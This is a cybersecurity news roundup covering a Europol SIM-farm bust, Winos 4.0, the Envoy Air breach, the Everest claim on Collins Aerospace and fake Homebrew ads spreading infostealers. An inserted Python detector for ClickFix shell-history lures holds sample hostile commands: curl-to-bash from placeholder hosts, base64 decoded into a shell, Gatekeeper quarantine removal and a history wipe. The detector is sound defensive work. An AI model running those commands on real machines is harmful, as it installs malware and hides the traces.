Cybersecurity News: Europol dismantles SIM farm, Envoy Air compromised, Everest claims Collins hack

In today’s cybersecurity news…

Europol dismantles 49 million fake account SIM farm

On Friday, the European Union's law enforcement agency Europol announced the disruption of a sophisticated cybercrime-as-a-service (CaaS) platform that ran a SIM farm enabling phishing and investment fraud. The agency's Operation SIMCARTEL involved 26 searches and seven arrests, along with the seizure of 1,200 SIM box devices holding 40,000 active SIM cards, which had enabled the creation of more than 49 million online accounts. The operation, a cooperation between Austria, Estonia, Finland, Latvia, Europol, and Eurojust (the European Union Agency for Criminal Justice Cooperation), targeted a network linked to over 3,200 cyber fraud cases in Austria and Latvia, with combined losses exceeding €4.9 million.

(The Hacker News)

China’s Silver Fox group takes Winos 4.0 to Japan and Malaysia

The group behind the Winos 4.0 malware family is making headlines again, expanding its targeting beyond China and Taiwan to Japan and Malaysia, and adding another remote access trojan, tracked as HoldingHands RAT (aka Gh0stBins). A researcher with Fortinet's FortiGuard Labs stated in a report that the campaign "relied on phishing emails with PDFs that contained embedded malicious links…these files masqueraded as official documents from the Ministry of Finance and included numerous links in addition to the one that delivered Winos 4.0." The malware is generally attributed to a Chinese cybercrime group known as Silver Fox.

(The Hacker News)

Increased use of AI in extortion and ransomware cyberattacks, says Microsoft

Following up on a story we covered on Friday's Cyber Security Headlines, and discussed at length in the Week In Review show, Microsoft's annual Digital Threats Report shows that, in addition to the proliferation of password attacks, AI is increasingly being used by threat actors to boost their capabilities by "automating phishing, scaling social engineering, creating synthetic media, finding vulnerabilities faster, and creating malware that can adapt itself." The report adds that defenders are also increasingly using AI to "spot threats, close detection gaps, catch phishing attempts, and protect vulnerable users." A link to the report is available in the show notes to this episode.

(Slashdot and Microsoft)

Envoy Air confirms Oracle E-Business Suite compromise

The airline, a regional and wholly owned subsidiary of American Airlines, has become the second company to confirm the theft of information as a result of a breach of its Oracle E-Business Suite application. The hacking campaign is alleged to be the work of the Russian Clop extortion group, and it obtained what is being described as a "limited amount of business information and commercial contact details." Clop had claimed to have stolen information from American Airlines by adding the company to its leak site; however, a spokesperson for American Airlines said the claim "pertained to Envoy Air and that American Airlines itself does not use the Oracle E-Business Suite application."

(The Record)

Huge thanks to our sponsor, ThreatLocker

Imagine having the power to decide exactly what runs in your IT environment — and blocking everything else by default. That’s what ThreatLocker delivers. As a zero-trust endpoint protection platform, ThreatLocker fills the gaps traditional solutions leave behind, giving your business stronger security and control. Don’t just react to threats — stop them with ThreatLocker.

Google ads for fake Homebrew, LogMeIn sites push infostealers

On September 2, we reported on cybercriminals abusing Meta's advertising platforms with fake offers of a free TradingView Premium app that spread the Brokewell malware for Android. Now a new campaign is targeting macOS developers with fake sites for TradingView, Homebrew and LogMeIn that deliver infostealing malware such as AMOS (Atomic macOS Stealer) and Odyssey. The campaign uses "ClickFix" techniques: the fake page presents a problem to fix, such as a failing login dialog or a connection security confirmation step, and walks the visitor through copying and running a command in Terminal, so the victims infect themselves. When checking some of the fake domains used in this campaign, BleepingComputer discovered that "in some cases the traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results."

(BleepingComputer)
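
As an added example (not code from the original page, from BleepingComputer or from the campaign report), the following Python triages a zsh history file for the command shapes a ClickFix lure asks a victim to run. The indicator regexes, the host allowlist and the sample history entries are constructed assumptions. The point a practitioner should take away is that Homebrew's genuine installer is itself a `bash -c "$(curl ...)"` one-liner, so a detection cannot key on the fetch-and-execute shape alone; it has to look at where the download comes from.

```python
"""Triage macOS shell history for ClickFix-style "paste this into Terminal" one-liners.

Added example for the item above, not code from BleepingComputer or the campaign
report. Indicator regexes, ALLOWED_HOSTS and SAMPLE_HISTORY are constructed.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Hosts whose fetch-and-execute installers you trust (assumed policy). Homebrew's
# published install command downloads its script from raw.githubusercontent.com.
ALLOWED_HOSTS = {"raw.githubusercontent.com"}

# Download piped or substituted straight into a shell: the core ClickFix shape.
FETCH_EXEC = [
    re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(bash|sh|zsh)\b"),   # curl ... | sh
    re.compile(r"""\b(bash|sh|zsh)\s+-c\s+["']?\$\(\s*(curl|wget)\b"""),  # bash -c "$(curl ...)"
]
OTHER_INDICATORS = {
    # obfuscated payload decoded on the fly into a shell (-D is the BSD/macOS flag)
    "base64_to_shell": re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh)\b"),
    # Gatekeeper quarantine flag removed from a downloaded file
    "quarantine_strip": re.compile(r"\bxattr\s+(-r\s+)?-d\s+com\.apple\.quarantine\b"),
    # covering tracks
    "history_wipe": re.compile(r"\bhistory\s+-c\b|\brm\b[^;|&]*\.(zsh|bash)_history"),
}
URL_RX = re.compile(r"""https?://[^\s"')|]+""")
ZSH_PREFIX = re.compile(r"^:\s*\d+:\d+;")  # zsh EXTENDED_HISTORY ": <epoch>:<elapsed>;"
ECHO_B64 = re.compile(r"""echo\s+["']?([A-Za-z0-9+/=]{16,})["']?\s*\|\s*base64""")


@dataclass
class Finding:
    line_no: int
    command: str
    indicators: list[str]
    hosts: list[str]
    severity: str
    decoded_payload: str | None


def _decode_inline_base64(cmd: str) -> str | None:
    """Recover the payload of an `echo <b64> | base64 -D | sh` chain for the analyst."""
    m = ECHO_B64.search(cmd)
    if not m:
        return None
    blob = m.group(1)
    try:
        return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8", "replace")
    except ValueError:
        return None


def classify(raw: str, line_no: int = 0) -> Finding | None:
    """Return a Finding for one history entry, or None if nothing is suspicious."""
    cmd = ZSH_PREFIX.sub("", raw.strip())
    indicators: list[str] = []
    hosts = [urlparse(u).hostname or "" for u in URL_RX.findall(cmd)]
    if any(rx.search(cmd) for rx in FETCH_EXEC):
        # same shape as a legitimate installer; the host decides whether it is a problem
        if hosts and all(h in ALLOWED_HOSTS for h in hosts):
            indicators.append("fetch_exec_allowlisted_host")
        else:
            indicators.append("fetch_exec_untrusted_host")
    indicators += [name for name, rx in OTHER_INDICATORS.items() if rx.search(cmd)]
    if not indicators:
        return None
    severity = "info" if indicators == ["fetch_exec_allowlisted_host"] else "high"
    return Finding(line_no, cmd, indicators, hosts, severity, _decode_inline_base64(cmd))


def scan_history(lines: list[str]) -> list[Finding]:
    """Classify every entry of a history file; only entries with indicators are returned."""
    return [f for f in (classify(raw, n) for n, raw in enumerate(lines, 1)) if f]


# Constructed sample ~/.zsh_history. The payload is encoded here so the sample stays readable.
SAMPLE_PAYLOAD = "curl -fsSL https://updates.example.invalid/p | bash"
_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
SAMPLE_HISTORY = [
    ": 1729000000:0;brew update",
    ": 1729000010:0;git pull --rebase",
    # genuine Homebrew install command: same shape as the fakes, allowlisted host
    ': 1729000020:0;/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    # look-alike "Homebrew" command from a lure page (constructed host)
    ': 1729000030:0;/bin/bash -c "$(curl -fsSL https://brew-install.example.invalid/install.sh)"',
    # "fix your connection" lure: obfuscated payload decoded straight into bash
    f": 1729000040:0;echo '{_B64}' | base64 -D | bash",
    # constructed follow-up steps: unquarantine a download, then wipe history
    ": 1729000050:0;xattr -d com.apple.quarantine ~/Downloads/LogMeInSetup",
    ": 1729000060:0;history -c",
]
```

Running `scan_history(SAMPLE_HISTORY)` flags the look-alike installer, the base64 chain, the quarantine removal and the history wipe as high severity, while the genuine Homebrew command comes back as informational because its only URL is on the allowlist. The same patterns apply to the command line of EDR process-creation events for Terminal children, which is the better place to run them, since a victim who follows the lure to the end may also clear the history file.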

Cybercrime group Everest claims Collins Aerospace hack but mystery surrounds the story

The attack on European airports, including Heathrow, Brussels, and Berlin, dominated the news in September and even resulted in the arrest of one individual. Now the Everest group has claimed responsibility for the cyberattack on Collins Aerospace that caused chaos for these airports, their employees, and passengers. However, shortly after the statement, the group's leak site went dark, showing only a "Fatal Error" message. As Security Affairs notes, Everest is "part of a new generation of cybercriminal organizations that operate with a hybrid model. Instead of executing full-scale attacks alone, they often act as brokers, selling stolen access or partnering with affiliates who specialize in different stages of the intrusion chain." Speculation abounds as to why the site closed: it might be a law enforcement takedown, or simply a tactical retreat.

(Security Affairs)

Infostealing from space is easier than you think

Researchers from the University of Maryland and the University of California San Diego say they were “able to intercept sensitive data from the U.S. military, telecommunications firms, major businesses and organizations by passively scanning and collecting unencrypted data from the satellites responsible for beaming that information across the globe.” The team focused on geostationary satellites and used inexpensive, commercially available equipment. They stated that “many organizations do not routinely monitor the security of their own satellite communication links” and that content scrambling “is surprisingly unlikely to be used for private networks using GEO satellite to backhaul IP network traffic from remote areas.” A link to this report is available in the show notes to this episode.

(Cyberscoop)

SolarWinds security chief Tim Brown reflects on the 2020 hack

Speaking at Melbourne's CyberCon last Friday, Brown recalled the December 12 hack and its implications for the company he worked for as well as for its 300,000 customers. The breach occurred during the peak of the Covid-19 pandemic; the email platform his team relied on for communication during lockdown was unavailable, and all of his team had to return to the office. "You get the world wanting verbal communication," he said, "not written communication. And that is a kind of an important lesson: you can write things down, but they want to talk to the CISO." The stress and resulting lawsuits led to Brown suffering a heart attack. He is still CISO at SolarWinds.

(The Guardian)

Steve Prentice
Author, speaker, expert in the area where people and technology crash into each other, viewed from the organizational psychology perspective. Host of many podcasts, voice actor and narrator for corporate media and audiobooks. Ghost-writer for busy executives.